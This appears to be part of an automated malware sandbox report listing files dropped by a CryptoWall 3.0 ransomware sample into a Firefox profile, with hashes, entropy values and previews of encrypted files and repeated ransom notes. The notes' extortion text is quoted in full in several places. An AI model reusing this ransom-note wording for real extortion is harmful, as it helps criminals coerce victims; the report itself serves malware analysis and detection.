                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..............}.....Z5.n.C.....|=mi..Ld.@.N;.8.f.%j.Ai.2P..y...<..o.Ja.ab.-.kX,..9..Y.'.}.Z.....x.....l..G.w.$p....{.%. bS.5.......=..j....:....[..|.P*.51.....7.i.8..i..w,_...bI......O|....f.e....Q.J.&N.....Y.F....+._U.Mk....#m.X.DV qM..}j..3..3D....\~Xy.1..y.e....m.....6>.Z.u'HTD._.J..f.CJ.;....._`..o..o.X".R...1...(..:...^...M.......{.;M6..wq..WS.4......X......C.e...M&.{.......2.B4.{.P.....).....~m..o...S..;;.!....8B4...0n......u~ JG.=..Uj.sd&.....=...F...^qR.CO...K.4..:..I.K.h..E.]....H....r.&....?.....&...E.....?..{..p.....wM.....6Xn...G..c.M2.6.S....)..\...c.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet4_values.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1598
                                                                                                                          Entropy (8bit):7.672650237291229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgS06PPEszf+8yAdHUZ2bsJLJ0+:cztoDbRP8szfdyAy4sJLJd
                                                                                                                          MD5:6165F5FEB5DBC5DE57A8623A911C15E6
                                                                                                                          SHA1:DEE80FE2675BBEDA009F68F38F32EE84A9BE6644
                                                                                                                          SHA-256:3C20AC46B1C9E23D0871454838B49504564B0597F45342E8647A3C531CB3E730
                                                                                                                          SHA-512:F4FEF9FE32FD8C7895F4218B8EBDAC6B1171A58A8489A244A22316BB4DEBA2BFC487744E227443DCD1F36D2D6DD5A767F7637F99860C4DE210B277AFF3195978
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....Fl..1..S.0.......*..ZPju.....Z..w.....y..[e.L.9j.7..Q....l75.S.U.......i^.w...c....V..~.....OW.4.Z.r5.3{(s.I=..++Y.+rEZ+R.d..u....c.....6....$....[.x...6....Yeyt.F.....K.^..0.}.@..............QVL.\...Q..k..G.?.....Q.be....-..F...u?j.-W..N..?..2.9..V...B.?T1A.E.......P......0..r..i=.}.m.xMo...l#.W. bm.].KS^k3pJ...q....h.H&....#.E...5.Q.u.....;.4.2]c.?s.....<....Bu...i.....)....>e.o..v!..6..L)...NGR|v..2.....6&.L..*M....;u;..>T9..q<.$(.....S....{....n......Gx.bc.!.X.&..F.:u..J..N..{ :o.a.j..e._.g._..>._.C..$...K..hx.f-.e..7.g..!...,.J .0+.X.Z..G...Z...P!...?j..

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\playStore.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3118
                                                                                                                          Entropy (8bit):7.882394875701561
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDFXarlQu5Lrui+4cYMp2juOgvcI9RN:GoGQu5l+rYBjuOgvcIN
                                                                                                                          MD5:FC0CEC71A03C0C9BFD2FC5553215E3EE
                                                                                                                          SHA1:8FEED1414E442F4C2BC5B48D3D0CFA55D2AFDBAD
                                                                                                                          SHA-256:B7BF6060B1889992A130D14F6CAB106A9B74AA9B6CAEB59D436F47565B51CB41
                                                                                                                          SHA-512:0D3993C99FE0DC87E3AF819485BAEC175EF498EF96AE53A6EAD9D22009D374723102F872C80B90A390D84F6F067F67DE0D91D02648491B35224FEE264AE265AD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..I...sFK.L...h0.....B..i.6....BFRa....e../...QLR,.M.....2....:..>.=FO.q.L@[..BV.2.;L.pt.V.+g..iNO:...:..U.9wv.t!...o.o&I.W.M.f.zd#.ip.e.%.@,...)..5..B.T.W1...k:!n.m....`.u/i..D}Y[.R<{......#../H.7..Et!'.$m..4..?0fi.m*..5.kt...w.o|........ny.N..[..*........i....g...=.p} ..y|..k.6Y..n.NwP..I...Y.=..X....2.M_q.U...h...y.M.F..Jk.........|y..i.!^..........0..i)..X..!.!...iE.7.!.A^.B+uI....B.!. .,5...NL.%..*.g..iM.:.cY...~.....L.>...9....gO@.....C![.{g^bcK.#..d!.......#.X4.[.....>..X>.dnx....@3..G..yd^.oS5o.V;3.....:..9h3.6.]..G>.L.C.O.h....h...v...'q.&...%c...9=.5.o41.\..#.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\fragments\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\fragments\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\utility\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\utility\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\values\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\tmpl\values\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\index.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5742
                                                                                                                          Entropy (8bit):7.949931290360847
                                                                                                                          Encrypted:false
